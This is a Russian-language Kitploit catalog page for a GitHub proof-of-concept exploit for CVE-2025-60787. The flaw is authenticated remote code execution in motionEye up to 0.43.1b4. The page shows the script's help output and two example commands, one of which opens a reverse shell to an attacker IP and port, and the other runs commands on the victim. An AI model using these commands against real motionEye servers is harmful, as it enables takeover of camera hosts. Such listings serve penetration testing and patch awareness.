Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/gunzf0x/cve-2025-60787
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingИнструмент Удаленного Доступа
GitHubgunzf0x/cve-2025-60787

CVE-2025-60787

Автоматизированное PoC для CVE-2025-60787, обеспечивающее аутентифицированное удаленное выполнение кода на серверах motionEye до версии 0.43.1b4, с режимами обратной оболочки и выполнения команд.

Репозиторий
101176 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-60787 - Авторизованное RCE в motionEye

PoC для CVE-2025-60787 — это уязвимость авторизованного удаленного выполнения кода (Authenticated RCE) в motionEye для всех затронутых версий до 0.43.1b4 (включительно).

Это автоматизированный PoC для уязвимости, описанной в этом репозитории. Авторство: prabhatverma47.

Использование

Скрипт имеет 2 команды, которые эксплуатируют уязвимость. Одна команда под названием revshell отправляет обратную оболочку (reverse shell), а другая команда command напрямую выполняет команды, используя эту CVE.

root@kitploit:~
❯ python3 CVE-2025-60787.py -h

usage: CVE-2025-60787.py [-h] {revshell,command} ...

PoC for CVE-2025-60787 -- Authenticated RCE in motionEye by gunzf0x

positional arguments:
  {revshell,command}  Choose between send a reverse shell or (attempting to) run commands
    revshell          Attempt to send a reverse shell using CVE-2025-60787 vuln
    command           Execute a command remotely using CVE-2025-60787 vuln

options:
  -h, --help          show this help message and exit

Обратная оболочка (Reverse Shell)

Используйте команду revshell для получения оболочки. Например:

root@kitploit:~
python3 CVE-2025-60787.py revshell --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -i 10.10.10.15 --port 9001

Где 10.10.10.10 — целевая машина (машина, на которой запущен motionEye), 10.10.10.15 — наша атакующая машина, а 9001 — порт, который мы слушаем для перехвата обратной оболочки.

Выполнение команд

Если вместо обратной оболочки мы хотим удалённо выполнить другие команды, можно использовать параметр command. Например, выполнить команду ping -c1 10.10.10.15 на машине жертвы:

root@kitploit:~
python3 CVE-2025-60787.py command --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -e 'ping -c1 10.10.10.15'

Где 10.10.10.10 — машина, на которой запущен motionEye.

Отказ от ответственности

Используйте этот скрипт всегда на свой собственный риск.

Будьте этичны (:

Скачать инструмент